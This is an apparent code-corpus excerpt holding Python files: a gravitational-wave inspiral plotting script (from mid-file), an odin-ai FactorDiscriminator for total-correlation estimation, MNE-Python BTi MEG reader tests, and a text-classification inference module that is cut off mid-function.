#integrand = UnivariateSpline(np.log(f), f* phaseIntegrand(sp, f), k=5)
#Phi = integrand.antiderivative()
#Phi = np.array([quad(lambda f: np.exp(-5./3.*f)/L(sp, np.exp(f)), np.log(f_gw[0]), np.log(y0))[0] for y0 in f_gw ])
Phi = np.cumsum([quad(lambda f: f**(-8./3.)/L(sp, f), f_gw[i-1], f_gw[i], limit=200, epsrel=1e-13, epsabs=1e-13)[0] if not i == 0 else 0. for i in range(len(f_gw)) ])
Phi = 10./3. * (8.*np.pi*sp.m_chirp())**(-5./3.) * (Phi - Phi[-1])
#integrand2 = UnivariateSpline(np.log(f), f * f**(-11./3.)/L(sp, f), k=5)
#integrand2 = UnivariateSpline(np.log(f), phaseIntegrand(sp, f), k=5)
#tpt = integrand2.antiderivative()
#tpt = np.array([quad(lambda f: np.exp(-8./3.*f)/L(sp, np.exp(f)), np.log(f_gw[0]), np.log(y0))[0] for y0 in f_gw ])
tpt = np.cumsum([quad(lambda f: f**(-11./3.)/L(sp, f), f_gw[i-1], f_gw[i], limit=200, epsrel=1e-13, epsabs=1e-13)[0] if not i==0 else 0. for i in range(len(f_gw)) ])
tpt = 10./3. * (8.*np.pi*sp.m_chirp())**(-5./3.) * f_gw * ( tpt - tpt[-1])
PhiTild = tpt - Phi
DeltaPhi = PhiTild - PhiTild0
plt.plot(f_gw*ms.year_to_pc*3.17e-8, Phi, label=r'$\Phi^{paper}$')
plt.plot(f_gw*ms.year_to_pc*3.17e-8, tpt, label=r'$2\pi t^{paper}$')
plt.plot(f_gw*ms.year_to_pc*3.17e-8, PhiTild, label=r'$\tilde{\Phi}^{paper}$')
plt.plot(f_gw*ms.year_to_pc*3.17e-8, DeltaPhi, label=r'$\Delta\tilde{\Phi}^{paper}$')
plt.xlabel('f')
plt.xscale('log')
plt.yscale('symlog')
def plotWaveform(sp, t, R, omega_s):
#f = np.geomspace(omega_s[1], omega_s[-2], num=500)/np.pi
f_gw, h, _, Psi = waveform.h_2( sp, t, omega_s, R)
plt.loglog(f_gw*ms.year_to_pc*3.17e-8, h, label=r'$\tilde{h}^{code}$')
alpha = sp.halo.alpha
eps = F(sp,2.*sp.r_isco())/Meff(sp, 2.*sp.r_isco())
A = (5./24.)**(1./2.) * np.pi**(-2./3.) /sp.D * sp.m_chirp()**(5./6.)
plt.loglog(f_gw*ms.year_to_pc*3.17e-8, A*f_gw**(-7./6.) * (L(sp,f_gw))**(-1./2.), label=r'$\tilde{h}^{paper,approx}$')
delta = (Meff(sp, 2.*sp.r_isco())/np.pi**2 / f_gw**2)**(1.-alpha/3.)
chi = 1. + delta*eps/3. + (2.-alpha)/9. *delta**2 * eps**2
x = (delta*eps)**(1./(3.-alpha)) *chi
c_gw, c_df, ctild = coeffs(sp)
plt.loglog(f_gw*ms.year_to_pc*3.17e-8, A*f_gw**(-7./6.) * chi**(19./4.) * (K(x, alpha)* (1. + ctild*J(x, alpha)*(1.+b_A(sp, x, alpha)) ))**(-1./2.), label=r'$\tilde{h}^{paper}$' )
plt.ylabel('h'); plt.xlabel('f')
m1 = 1e3 *ms.solar_mass_to_pc
m2 = 1. *ms.solar_mass_to_pc
D = 1e3
#sp_0 = ms.SystemProp(m1, m2, 1e3, ms.ConstHalo(0))
sp_1 = ms.SystemProp(m1, m2, halo.SpikedNFW( 2.68e-13, 23.1, 0.54, 7./3.), D)
plt.figure()
plotDiffEq(sp_1, sp_1.r_isco(), 1e7*sp_1.r_isco())
plt.legend(); plt.grid()
plt.figure()
plotPhiprimeprime(sp_1, sp_1.r_isco(), 1e5*sp_1.r_isco())
plt.legend(); plt.grid()
R0 = 100.*sp_1.r_isco()
t, R, m2 = inspiral.Classic.evolve_circular_binary(sp_1, R0, sp_1.r_isco(), acc=1e-11, accretion=True)
sp_1.m2=m2
omega_s = sp_1.omega_s(R)
plt.figure()
plotPhase(sp_1, t, R, omega_s)
plt.legend(); plt.grid()
plt.figure()
plotWaveform(sp_1, t, R, omega_s)
plt.legend(); plt.grid()
plt.figure()
plt.loglog(t, m2/ms.solar_mass_to_pc, label="$m_2$")
plt.legend(); plt.grid()
print("mass increase:", m2[-1]/m2[0] -1.)
# Now check the eccentric implementation with a tiny eccentricity, it should be very similar
a0 = 100.*sp_1.r_isco()
e0 = 0.001
sp_1.m2 = 1.*ms.solar_mass_to_pc
t2, a2, e2, m22 = inspiral.Classic.evolve_elliptic_binary(sp_1, a0, e0, sp_1.r_isco(), acc=1e-11, accretion=True)
plt.figure()
plt.loglog(t, R, label='R, cirlular')
plt.loglog(t2, a2, label='a, elliptic')
plt.loglog(t, m2, label='$m_2$, cirlular')
plt.loglog(t2, m22, label='$m_2$, elliptic')
plt.loglog(t2, e2, label='e')
plt.grid(); plt.legend()
plt.show()
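# --- Usage sketch (hypothetical): repeating the dephasing comparison for a
# different spike slope alpha, reusing the helpers above.  The halo parameters
# are the illustrative ones from this script, not additional values from the
# paper.
def rerun_for_alpha(alpha=9./4.):
    sp = ms.SystemProp(m1, 1. * ms.solar_mass_to_pc,
                       halo.SpikedNFW(2.68e-13, 23.1, 0.54, alpha), D)
    t_a, R_a, m2_a = inspiral.Classic.evolve_circular_binary(
        sp, 100. * sp.r_isco(), sp.r_isco(), acc=1e-10, accretion=True)
    sp.m2 = m2_a
    plt.figure()
    plotPhase(sp, t_a, R_a, sp.omega_s(R_a))
    plt.legend(); plt.grid()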
81630bea6fd9bbf59bfd233fed775e2d7f455fc9 | 10,794 | py | Python | odin/bay/vi/autoencoder/factor_discriminator.py | trungnt13/odin-ai | MIT | stars: 7
import warnings
from typing import Any, Callable, List, Optional, Union, Sequence
import numpy as np
import tensorflow as tf
from odin.bay.layers import DistributionDense
from odin.bay.random_variable import RVconf
from odin.bay.vi.utils import permute_dims
from odin.networks import SequentialNetwork, dense_network
from odin.utils import as_tuple
from tensorflow_probability.python.distributions import (Distribution,
Independent)
from typing_extensions import Literal
class FactorDiscriminator(SequentialNetwork):
r""" The main goal is minimizing the total correlation (the mutual information
which quantifies the redundancy or dependency among latent variables).
  We use a discriminator to estimate the total correlation.
  This class also supports a semi-supervised factor discriminator, a combination
  of a supervised objective and total-correlation estimation using a density ratio.
- 0: real sample for q(z) (or last unit in case n_outputs > 2) and
- 1: fake sample from q(z-)
If `n_outputs` > 2, suppose the number of classes is `K` then:
- 0 to K: is the classes' logits for real sample from q(z)
- K + 1: fake sample from q(z-)
This class is also extended to handle supervised loss for semi-supervised
systems.
  Parameters
-----------
units : a list of Integer, the number of hidden units for each hidden layer.
n_outputs : an Integer or instance of `RVmeta`,
the number of output units and its distribution
ss_strategy : {'sum', 'logsumexp', 'mean', 'max', 'min'}.
    Strategy for combining the semi-supervised outputs into the
logit for real sample from q(z):
- 'logsumexp' : used for semi-supervised GAN in (Salimans T. 2016)
Example
--------
```
# for FactorVAE
FactorDiscriminator(
observation=RVmeta(1, 'bernoulli', projection=True, name="ind_factors"))
# for classifier of ConditionalVAE
FactorDiscriminator(
observation=RVmeta(ds.shape, 'bernoulli', projection=True, name='image'))
```
References
------------
Kim, H., Mnih, A., 2018. "Disentangling by Factorising".
arXiv:1802.05983 [cs, stat].
Salimans, T., Goodfellow, I., Zaremba, W., et al 2016.
"Improved Techniques for Training GANs". arXiv:1606.03498 [cs.LG].
"""
def __init__(
self,
batchnorm: bool = False,
input_dropout: float = 0.,
dropout: float = 0.,
units: Sequence[int] = (1000, 1000, 1000, 1000, 1000),
observation: Union[RVconf, Sequence[RVconf]] = RVconf(1,
'bernoulli',
projection=True,
name="discriminator"),
activation: Union[
str, Callable[[tf.Tensor], tf.Tensor]] = tf.nn.leaky_relu,
ss_strategy: Literal['sum', 'logsumexp', 'mean', 'max',
'min'] = 'logsumexp',
name: str = "FactorDiscriminator",
):
if not isinstance(observation, (tuple, list)):
observation = [observation]
assert len(observation) > 0, "No output is given for FactorDiscriminator"
assert all(
isinstance(o, (RVconf, DistributionDense)) for o in observation), (
f"outputs must be instance of RVmeta, but given:{observation}")
n_outputs = 0
for o in observation:
if not o.projection:
warnings.warn(f'Projection turn off for observation {o}!')
o.event_shape = (int(np.prod(o.event_shape)),)
n_outputs += o.event_shape[0]
layers = dense_network(units=units,
batchnorm=batchnorm,
dropout=dropout,
flatten_inputs=True,
input_dropout=input_dropout,
activation=activation,
prefix=name)
super().__init__(layers, name=name)
self.ss_strategy = str(ss_strategy)
self.observation = observation
self.n_outputs = n_outputs
self._distributions = []
assert self.ss_strategy in {'sum', 'logsumexp', 'mean', 'max', 'min'}
def build(self, input_shape=None):
super().build(input_shape)
shape = self.output_shape[1:]
self._distributions = [
o.create_posterior(shape) if isinstance(o, RVconf) else o
for o in self.observation
]
self.input_ndim = len(self.input_shape) - 1
return self
def call(self, inputs, **kwargs):
if isinstance(inputs, (tuple, list)) and len(inputs) == 1:
inputs = inputs[0]
outputs = super().call(inputs, **kwargs)
# project into different output distributions
distributions = [d(outputs, **kwargs) for d in self.distributions]
return distributions[0] if len(distributions) == 1 else tuple(distributions)
def _to_samples(self, qz_x, mean=False, stop_grad=False):
qz_x = tf.nest.flatten(qz_x)
if mean:
z = tf.concat([q.mean() for q in qz_x], axis=-1)
else:
z = tf.concat([tf.convert_to_tensor(q) for q in qz_x], axis=-1)
z = tf.reshape(z, tf.concat([(-1,), z.shape[-self.input_ndim:]], axis=0))
if stop_grad:
z = tf.stop_gradient(z)
return z
def _tc_logits(self, logits):
# use ss_strategy to infer appropriate logits value for
# total-correlation estimator (logits for q(z)) in case of n_outputs > 1
Xs = []
for x in tf.nest.flatten(logits):
if isinstance(x, Distribution):
if isinstance(x, Independent):
x = x.distribution
if hasattr(x, 'logits'):
x = x.logits
elif hasattr(x, 'concentration'):
x = x.concentration
else:
raise RuntimeError(
f"Distribution {x} doesn't has 'logits' or 'concentration' "
"attributes, cannot not be used for estimating total correlation."
)
Xs.append(x)
# concatenate the outputs
if len(Xs) == 0:
raise RuntimeError(
f"No logits values found for total correlation: {logits}")
elif len(Xs) == 1:
Xs = Xs[0]
else:
Xs = tf.concat(Xs, axis=-1)
# only 1 unit, only estimate TC
if self.n_outputs == 1:
return Xs[..., 0]
# multiple units, reduce
return getattr(tf, 'reduce_%s' % self.ss_strategy)(Xs, axis=-1)
def total_correlation(self,
qz_x: Distribution,
training: Optional[bool] = None) -> tf.Tensor:
r""" Total correlation Eq(3)
```
TC(z) = KL(q(z)||q(z-)) = E_q(z)[log(q(z) / q(z-))]
~ E_q(z)[ log(D(z)) - log(1 - D(z)) ]
```
We want to minimize the total correlation to achieve factorized latent units
Note:
      In many implementations, `log(q(z-)) - log(q(z))` is referred to as the `total
      correlation loss`; here, we return `log(q(z)) - log(q(z-))` as the total
      correlation for the construction of the ELBO in Eq(2).
Arguments:
qz_x : a Tensor, [batch_dim, latent_dim] or Distribution
Return:
TC(z) : a scalar, approximation of the density-ratio that arises in the
KL-term.
"""
z = self._to_samples(qz_x, stop_grad=False)
logits = self(z, training=training)
logits = self._tc_logits(logits)
    # In the sigmoid case, other implementations use -logits here, but it
    # should be logits.
    # If it were negative here, TC would be reduced; reasonably, it must be positive (?)
return tf.reduce_mean(logits)
def dtc_loss(self,
qz_x: Distribution,
qz_xprime: Optional[Distribution] = None,
training: Optional[bool] = None) -> tf.Tensor:
r""" Discriminated total correlation loss Algorithm(2)
Minimize the probability of:
- `q(z)` misclassified as `D(z)[:, 0]`
- `q(z')` misclassified as `D(z')[:, 1]`
Arguments:
qz_x : `Tensor` or `Distribution`.
Samples of the latents from first batch
qz_xprime : `Tensor` or `Distribution` (optional).
Samples of the latents from second batch, this will be permuted.
If not given, then reuse `qz_x`.
Return:
scalar - loss value for training the discriminator
"""
# we don't want the gradient to be propagated to the encoder
z = self._to_samples(qz_x, stop_grad=True)
z_logits = self._tc_logits(self(z, training=training))
    # Using the built-in log-sigmoid gives more numerically stable results than
    # computing the log-sum-exp yourself.
d_z = -tf.math.log_sigmoid(z_logits) # must be negative here
# for X_prime
if qz_xprime is not None:
z = self._to_samples(qz_xprime, stop_grad=True)
z_perm = permute_dims(z)
zperm_logits = self._tc_logits(self(z_perm, training=training))
d_zperm = -tf.math.log_sigmoid(zperm_logits) # also negative here
# reduce the negative of d_z, and the positive of d_zperm
    # this is equal to cross_entropy(d_z, zeros) + cross_entropy(d_zperm, ones)
loss = 0.5 * (tf.reduce_mean(d_z) + tf.reduce_mean(zperm_logits + d_zperm))
return loss
def supervised_loss(self,
labels: Union[tf.Tensor, List[tf.Tensor]],
qz_x: Distribution,
mean: bool = False,
mask: Optional[tf.Tensor] = None,
training: Optional[bool] = None) -> tf.Tensor:
labels = as_tuple(labels)
z = self._to_samples(qz_x, mean=mean, stop_grad=True)
distributions = as_tuple(self(z, training=training))
## applying the mask (1-labelled, 0-unlabelled)
if mask is not None:
mask = tf.reshape(mask, (-1,))
# labels = [tf.boolean_mask(y, mask, axis=0) for y in labels]
# z_logits = tf.boolean_mask(z_logits, mask, axis=0)
## calculate the loss
loss = 0.
for dist, y_true in zip(distributions, labels):
llk = dist.log_prob(y_true)
      # check the mask carefully here:
      # if there is no labelled data, just return 0
if mask is not None:
llk = tf.cond(tf.reduce_all(tf.logical_not(mask)), lambda: 0.,
lambda: tf.boolean_mask(llk, mask, axis=0))
# negative log-likelihood here
loss += -llk
    # check for a non-zero loss; if it is zero the gradient must be stopped or NaN gradients can occur
loss = tf.reduce_mean(loss)
loss = tf.cond(
tf.abs(loss) < 1e-8, lambda: tf.stop_gradient(loss), lambda: loss)
return loss
@property
def n_observation(self) -> int:
return len(self.observation)
@property
def distributions(self) -> List[DistributionDense]:
return self._distributions
@property
def prior(self) -> List[Distribution]:
return [d.prior for d in self._distributions]
def __str__(self):
s = super().__str__()
s1 = ['\n Outputs:']
for i, d in enumerate(self.distributions):
s1.append(f' [{i}]{d}')
return s + '\n'.join(s1)
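if __name__ == '__main__':
  # Standalone sketch (an assumption for illustration, not part of the odin API)
  # of the density-ratio trick implemented by `total_correlation` and `dtc_loss`
  # above, written in plain TensorFlow so it runs without building the full
  # discriminator; the summed-coordinates "discriminator" is a stand-in only.
  tf.random.set_seed(8)
  z = tf.random.normal((16, 4))  # samples from q(z|x)
  # permute every latent dimension independently across the batch -> q(z-)
  z_perm = tf.stack(
      [tf.random.shuffle(z[:, i]) for i in range(z.shape[-1])], axis=-1)
  d = lambda v: tf.reduce_sum(v, axis=-1)  # stand-in for the D(z) logits
  tc_estimate = tf.reduce_mean(d(z))  # mirrors total_correlation()
  # mirrors dtc_loss(): binary cross-entropy separating z from z_perm
  dtc = 0.5 * (tf.reduce_mean(-tf.math.log_sigmoid(d(z))) +
               tf.reduce_mean(d(z_perm) - tf.math.log_sigmoid(d(z_perm))))
  print(float(tc_estimate), float(dtc))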
| 37.741259 | 83 | 0.626089 |
2c5ba8347f7943822934181859ccece4355cd9dd | 11,903 | py | Python | mne/io/bti/tests/test_bti.py | mvdoc/mne-python | bac50dd08361b10d0a65c614ea2de06308750411 | [
"BSD-3-Clause"
] | null | null | null | mne/io/bti/tests/test_bti.py | mvdoc/mne-python | bac50dd08361b10d0a65c614ea2de06308750411 | [
"BSD-3-Clause"
] | null | null | null | mne/io/bti/tests/test_bti.py | mvdoc/mne-python | bac50dd08361b10d0a65c614ea2de06308750411 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import print_function
# Authors: Denis Engemann <denis.engemann@gmail.com>
#
# License: BSD (3-clause)
import os
import os.path as op
from functools import reduce, partial
import warnings
import numpy as np
from numpy.testing import (assert_array_almost_equal, assert_array_equal,
assert_allclose)
from nose.tools import assert_true, assert_raises, assert_equal
from mne.io import read_raw_fif, read_raw_bti
from mne.io.bti.bti import (_read_config, _process_bti_headshape,
_read_bti_header, _get_bti_dev_t,
_correct_trans, _get_bti_info)
from mne.io.tests.test_raw import _test_raw_reader
from mne.tests.common import assert_dig_allclose
from mne.io.pick import pick_info
from mne.io.constants import FIFF
from mne import pick_types
from mne.utils import run_tests_if_main, slow_test
from mne.transforms import Transform, combine_transforms, invert_transform
from mne.externals import six
warnings.simplefilter('always')
base_dir = op.join(op.abspath(op.dirname(__file__)), 'data')
archs = 'linux', 'solaris'
pdf_fnames = [op.join(base_dir, 'test_pdf_%s' % a) for a in archs]
config_fnames = [op.join(base_dir, 'test_config_%s' % a) for a in archs]
hs_fnames = [op.join(base_dir, 'test_hs_%s' % a) for a in archs]
exported_fnames = [op.join(base_dir, 'exported4D_%s_raw.fif' % a)
for a in archs]
tmp_raw_fname = op.join(base_dir, 'tmp_raw.fif')
# the 4D exporter doesn't export all channels, so we confine our comparison
NCH = 248
def test_read_config():
"""Test read bti config file."""
# for config in config_fname, config_solaris_fname:
for config in config_fnames:
cfg = _read_config(config)
assert_true(all('unknown' not in block.lower() and block != ''
for block in cfg['user_blocks']))
def test_crop_append():
"""Test crop and append raw."""
raw = _test_raw_reader(
read_raw_bti, pdf_fname=pdf_fnames[0],
config_fname=config_fnames[0], head_shape_fname=hs_fnames[0])
y, t = raw[:]
t0, t1 = 0.25 * t[-1], 0.75 * t[-1]
mask = (t0 <= t) * (t <= t1)
raw_ = raw.copy().crop(t0, t1)
y_, _ = raw_[:]
assert_true(y_.shape[1] == mask.sum())
assert_true(y_.shape[0] == y.shape[0])
def test_transforms():
"""Test transformations."""
bti_trans = (0.0, 0.02, 0.11)
bti_dev_t = Transform('ctf_meg', 'meg', _get_bti_dev_t(0.0, bti_trans))
for pdf, config, hs, in zip(pdf_fnames, config_fnames, hs_fnames):
raw = read_raw_bti(pdf, config, hs, preload=False)
dev_ctf_t = raw.info['dev_ctf_t']
dev_head_t_old = raw.info['dev_head_t']
ctf_head_t = raw.info['ctf_head_t']
# 1) get BTI->Neuromag
bti_dev_t = Transform('ctf_meg', 'meg', _get_bti_dev_t(0.0, bti_trans))
# 2) get Neuromag->BTI head
t = combine_transforms(invert_transform(bti_dev_t), dev_ctf_t,
'meg', 'ctf_head')
# 3) get Neuromag->head
dev_head_t_new = combine_transforms(t, ctf_head_t, 'meg', 'head')
assert_array_equal(dev_head_t_new['trans'], dev_head_t_old['trans'])
@slow_test
def test_raw():
"""Test bti conversion to Raw object."""
for pdf, config, hs, exported in zip(pdf_fnames, config_fnames, hs_fnames,
exported_fnames):
# rx = 2 if 'linux' in pdf else 0
assert_raises(ValueError, read_raw_bti, pdf, 'eggs', preload=False)
assert_raises(ValueError, read_raw_bti, pdf, config, 'spam',
preload=False)
if op.exists(tmp_raw_fname):
os.remove(tmp_raw_fname)
ex = read_raw_fif(exported, preload=True)
ra = read_raw_bti(pdf, config, hs, preload=False)
assert_true('RawBTi' in repr(ra))
assert_equal(ex.ch_names[:NCH], ra.ch_names[:NCH])
assert_array_almost_equal(ex.info['dev_head_t']['trans'],
ra.info['dev_head_t']['trans'], 7)
assert_dig_allclose(ex.info, ra.info)
coil1, coil2 = [np.concatenate([d['loc'].flatten()
for d in r_.info['chs'][:NCH]])
for r_ in (ra, ex)]
assert_array_almost_equal(coil1, coil2, 7)
loc1, loc2 = [np.concatenate([d['loc'].flatten()
for d in r_.info['chs'][:NCH]])
for r_ in (ra, ex)]
assert_allclose(loc1, loc2)
assert_allclose(ra[:NCH][0], ex[:NCH][0])
assert_array_equal([c['range'] for c in ra.info['chs'][:NCH]],
[c['range'] for c in ex.info['chs'][:NCH]])
assert_array_equal([c['cal'] for c in ra.info['chs'][:NCH]],
[c['cal'] for c in ex.info['chs'][:NCH]])
assert_array_equal(ra._cals[:NCH], ex._cals[:NCH])
# check our transforms
for key in ('dev_head_t', 'dev_ctf_t', 'ctf_head_t'):
if ex.info[key] is None:
pass
else:
assert_true(ra.info[key] is not None)
for ent in ('to', 'from', 'trans'):
assert_allclose(ex.info[key][ent],
ra.info[key][ent])
ra.save(tmp_raw_fname)
re = read_raw_fif(tmp_raw_fname)
print(re)
for key in ('dev_head_t', 'dev_ctf_t', 'ctf_head_t'):
assert_true(isinstance(re.info[key], dict))
this_t = re.info[key]['trans']
assert_equal(this_t.shape, (4, 4))
            # check that the matrix is not the identity
assert_true(not np.allclose(this_t, np.eye(4)))
os.remove(tmp_raw_fname)
def test_info_no_rename_no_reorder_no_pdf():
"""Test private renaming, reordering and partial construction option."""
for pdf, config, hs in zip(pdf_fnames, config_fnames, hs_fnames):
info, bti_info = _get_bti_info(
pdf_fname=pdf, config_fname=config, head_shape_fname=hs,
rotation_x=0.0, translation=(0.0, 0.02, 0.11), convert=False,
ecg_ch='E31', eog_ch=('E63', 'E64'),
rename_channels=False, sort_by_ch_name=False)
info2, bti_info = _get_bti_info(
pdf_fname=None, config_fname=config, head_shape_fname=hs,
rotation_x=0.0, translation=(0.0, 0.02, 0.11), convert=False,
ecg_ch='E31', eog_ch=('E63', 'E64'),
rename_channels=False, sort_by_ch_name=False)
assert_equal(info['ch_names'],
[ch['ch_name'] for ch in info['chs']])
assert_equal([n for n in info['ch_names'] if n.startswith('A')][:5],
['A22', 'A2', 'A104', 'A241', 'A138'])
assert_equal([n for n in info['ch_names'] if n.startswith('A')][-5:],
['A133', 'A158', 'A44', 'A134', 'A216'])
info = pick_info(info, pick_types(info, meg=True, stim=True,
resp=True))
info2 = pick_info(info2, pick_types(info2, meg=True, stim=True,
resp=True))
assert_true(info['sfreq'] is not None)
assert_true(info['lowpass'] is not None)
assert_true(info['highpass'] is not None)
assert_true(info['meas_date'] is not None)
assert_equal(info2['sfreq'], None)
assert_equal(info2['lowpass'], None)
assert_equal(info2['highpass'], None)
assert_equal(info2['meas_date'], None)
assert_equal(info['ch_names'], info2['ch_names'])
assert_equal(info['ch_names'], info2['ch_names'])
for key in ['dev_ctf_t', 'dev_head_t', 'ctf_head_t']:
assert_array_equal(info[key]['trans'], info2[key]['trans'])
assert_array_equal(
np.array([ch['loc'] for ch in info['chs']]),
np.array([ch['loc'] for ch in info2['chs']]))
# just check reading data | corner case
raw1 = read_raw_bti(
pdf_fname=pdf, config_fname=config, head_shape_fname=None,
sort_by_ch_name=False, preload=True)
# just check reading data | corner case
raw2 = read_raw_bti(
pdf_fname=pdf, config_fname=config, head_shape_fname=None,
rename_channels=False,
sort_by_ch_name=True, preload=True)
sort_idx = [raw1.bti_ch_labels.index(ch) for ch in raw2.bti_ch_labels]
raw1._data = raw1._data[sort_idx]
assert_array_equal(raw1._data, raw2._data)
assert_array_equal(raw2.bti_ch_labels, raw2.ch_names)
def test_no_conversion():
"""Test bti no-conversion option."""
get_info = partial(
_get_bti_info,
rotation_x=0.0, translation=(0.0, 0.02, 0.11), convert=False,
ecg_ch='E31', eog_ch=('E63', 'E64'),
rename_channels=False, sort_by_ch_name=False)
for pdf, config, hs in zip(pdf_fnames, config_fnames, hs_fnames):
raw_info, _ = get_info(pdf, config, hs, convert=False)
raw_info_con = read_raw_bti(
pdf_fname=pdf, config_fname=config, head_shape_fname=hs,
convert=True, preload=False).info
pick_info(raw_info_con,
pick_types(raw_info_con, meg=True, ref_meg=True),
copy=False)
pick_info(raw_info,
pick_types(raw_info, meg=True, ref_meg=True), copy=False)
bti_info = _read_bti_header(pdf, config)
dev_ctf_t = _correct_trans(bti_info['bti_transform'][0])
assert_array_equal(dev_ctf_t, raw_info['dev_ctf_t']['trans'])
assert_array_equal(raw_info['dev_head_t']['trans'], np.eye(4))
assert_array_equal(raw_info['ctf_head_t']['trans'], np.eye(4))
dig, t = _process_bti_headshape(hs, convert=False, use_hpi=False)
assert_array_equal(t['trans'], np.eye(4))
for ii, (old, new, con) in enumerate(zip(
dig, raw_info['dig'], raw_info_con['dig'])):
assert_equal(old['ident'], new['ident'])
assert_array_equal(old['r'], new['r'])
assert_true(not np.allclose(old['r'], con['r']))
if ii > 10:
break
ch_map = dict((ch['chan_label'],
ch['loc']) for ch in bti_info['chs'])
for ii, ch_label in enumerate(raw_info['ch_names']):
if not ch_label.startswith('A'):
continue
t1 = ch_map[ch_label] # correction already performed in bti_info
t2 = raw_info['chs'][ii]['loc']
t3 = raw_info_con['chs'][ii]['loc']
assert_allclose(t1, t2, atol=1e-15)
assert_true(not np.allclose(t1, t3))
idx_a = raw_info_con['ch_names'].index('MEG 001')
idx_b = raw_info['ch_names'].index('A22')
assert_equal(
raw_info_con['chs'][idx_a]['coord_frame'],
FIFF.FIFFV_COORD_DEVICE)
assert_equal(
raw_info['chs'][idx_b]['coord_frame'],
FIFF.FIFFV_MNE_COORD_4D_HEAD)
def test_bytes_io():
"""Test bti bytes-io API."""
for pdf, config, hs in zip(pdf_fnames, config_fnames, hs_fnames):
raw = read_raw_bti(pdf, config, hs, convert=True, preload=False)
with open(pdf, 'rb') as fid:
pdf = six.BytesIO(fid.read())
with open(config, 'rb') as fid:
config = six.BytesIO(fid.read())
with open(hs, 'rb') as fid:
hs = six.BytesIO(fid.read())
raw2 = read_raw_bti(pdf, config, hs, convert=True, preload=False)
repr(raw2)
assert_array_equal(raw[:][0], raw2[:][0])
def test_setup_headshape():
"""Test reading bti headshape."""
for hs in hs_fnames:
dig, t = _process_bti_headshape(hs)
expected = set(['kind', 'ident', 'r'])
found = set(reduce(lambda x, y: list(x) + list(y),
[d.keys() for d in dig]))
assert_true(not expected - found)
run_tests_if_main()
| 40.763699 | 79 | 0.598925 |
ee2c5a4ca0335fd4df6a6c96f0bf2e837077db6b | 4,974 | py | Python | examples/tensorflow/inference/text-classification-ch/code/txt_cnn_rnn_inference.py | FinchZHU/uai-sdk | 78e06bebba2d18233ce6dcb5be619e940f7a7ef3 | [
"Apache-2.0"
] | 38 | 2017-04-26T04:00:09.000Z | 2022-02-10T02:51:05.000Z | examples/tensorflow/inference/text-classification-ch/code/txt_cnn_rnn_inference.py | FinchZHU/uai-sdk | 78e06bebba2d18233ce6dcb5be619e940f7a7ef3 | [
"Apache-2.0"
] | 17 | 2017-11-20T20:47:09.000Z | 2022-02-09T23:48:46.000Z | examples/tensorflow/inference/text-classification-ch/code/txt_cnn_rnn_inference.py | FinchZHU/uai-sdk | 78e06bebba2d18233ce6dcb5be619e940f7a7ef3 | [
"Apache-2.0"
] | 28 | 2017-07-08T05:23:13.000Z | 2020-08-18T03:12:27.000Z | # Copyright 2017 The UAI-SDK Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A text classification cnn/rnn inferencer.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
from PIL import Image
import numpy as np
import tensorflow as tf
import tensorflow.contrib.keras as kr
from cnn_model import TCNNConfig, TextCNN
from rnn_model import TRNNConfig, TextRNN
from cnews_loader import read_vocab, read_category
from uai.arch.tf_model import TFAiUcloudModel
if sys.version_info[0] > 2:
is_py3 = True
else:
reload(sys)
sys.setdefaultencoding("utf-8")
is_py3 = False
class TxtClassModel(TFAiUcloudModel):
""" TxtClass example model
"""
def __init__(self, conf):
super(TxtClassModel, self).__init__(conf)
def load_model(self):
pass
def preprocess(self, data):
return data.body
def execute(self, data, batch_size):
pass
class TxtClassCNNModel(TxtClassModel):
""" TxtClass example model
"""
def __init__(self, conf):
super(TxtClassCNNModel, self).__init__(conf)
def load_model(self):
sess = tf.Session()
print('Configuring CNN model...')
config = TCNNConfig()
cnn_model = TextCNN(config)
saver = tf.train.Saver()
params_file = tf.train.latest_checkpoint(self.model_dir)
saver.restore(sess, params_file)
categories, cat_to_id = read_category()
vocab_dir = 'cnews/cnews.vocab.txt'
words, word_to_id = read_vocab(vocab_dir)
self.words = words
self.word_to_id = word_to_id
self.categories = categories
self.cat_to_id = cat_to_id
self.cnn_model = cnn_model
self.sess = sess
print(self.cnn_model)
print(self.sess)
def native_content(self, content):
if not is_py3:
return content.decode('utf-8')
else:
return content
def execute(self, data, batch_size):
contents, labels = [], []
ret = [None] * batch_size
for i in range(batch_size):
line = self.preprocess(data[i])
contents.append(list(self.native_content(line)))
data_id = []
for i in range(len(contents)):
data_id.append([self.word_to_id[x] for x in contents[i] if x in self.word_to_id])
x_pad = kr.preprocessing.sequence.pad_sequences(data_id, 600)
print(self.cnn_model)
print(self.sess)
feed_dict = {
self.cnn_model.input_x: x_pad,
self.cnn_model.keep_prob: 1.0
}
results = self.sess.run(self.cnn_model.y_pred_cls, feed_dict=feed_dict)
i = 0
for res in results:
if ret[i] != None:
i=i+1
continue
ret[i] = self.categories[res]
i=i+1
return ret
class TxtClassRNNModel(TxtClassModel):
""" TxtClass example model
"""
def __init__(self, conf):
super(TxtClassRNNModel, self).__init__(conf)
def load_model(self):
sess = tf.Session()
    print('Configuring RNN model...')
config = TRNNConfig()
cnn_model = TextRNN(config)
saver = tf.train.Saver()
params_file = tf.train.latest_checkpoint(self.model_dir)
saver.restore(sess, params_file)
categories, cat_to_id = read_category()
vocab_dir = 'cnews/cnews.vocab.txt'
words, word_to_id = read_vocab(vocab_dir)
self.words = words
self.word_to_id = word_to_id
self.categories = categories
self.cat_to_id = cat_to_id
self.cnn_model = cnn_model
self.sess = sess
print(self.cnn_model)
print(self.sess)
def native_content(self, content):
if not is_py3:
return content.decode('utf-8')
else:
return content
def execute(self, data, batch_size):
contents, labels = [], []
ret = [None] * batch_size
for i in range(batch_size):
line = self.preprocess(data[i])
contents.append(list(self.native_content(line)))
data_id= []
for i in range(len(contents)):
data_id.append([self.word_to_id[x] for x in contents[i] if x in self.word_to_id])
x_pad = kr.preprocessing.sequence.pad_sequences(data_id, 600)
print(self.cnn_model)
print(self.sess)
feed_dict = {
self.cnn_model.input_x: x_pad,
self.cnn_model.keep_prob: 1.0
}
